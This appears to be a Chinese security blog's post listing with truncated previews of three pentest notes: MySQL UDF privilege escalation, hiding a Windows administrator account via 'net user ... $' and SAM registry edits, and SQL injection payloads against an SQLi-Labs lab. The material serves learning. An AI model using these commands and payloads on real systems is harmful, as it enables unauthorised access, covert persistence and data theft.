- 博客(3)
- 收藏
- 关注
RSS订阅原创 mysql的UDF提权
原理UDF ,(即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。原理就是自定义一个函数,让他可以任意的执行系统命令,达到提权目的。前提条件mysql的权限是root权限。配置文件中secure_file_priv=(未写路径)mysql版本小于5.7(自行测试过5.7版本以上创建目录会失败,不知是否有其他方法,欢迎指出。)创建目录先判断mysql版本 select version()如果版本大于
2021-03-27 16:52:22
127
原创 内网渗透技巧——windows隐藏账户
我们拿到windows服务器的管理员权限时,想要维持权限,可以采用隐藏账户的操作新建一个用户net user rongxinrou$ 123456 /addnet localgroup administrators rongxinrou$ add/此时net user 已经无法看到该用户了,但是控制面板中还可以看到2.修改注册表regeditHKEY_LOCAL_MACHINE\SAM\SAM 进入这里,需要更改下权限,让当前账户有权限修改。修改完成后重新进入注册表,HKEY_LOC
2021-02-22 20:23:01
369
原创 SQLI-Labs 1~10关随笔记录
Less-1http://192.168.201.133/sqli/Less-1/?id=1//这里是单引号闭合,可以通过添加单引号查看是否报错来看出。http://192.168.201.133/sqli/Less-1/?id=1' order by 3 -- qwe//通过oder by 判断字段数。http://192.168.201.133/sqli/Less-1/?id=1' union select 1,2,3 -- qwe//确定输出点http://192.168.201.
2021-02-06 18:12:19
106
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人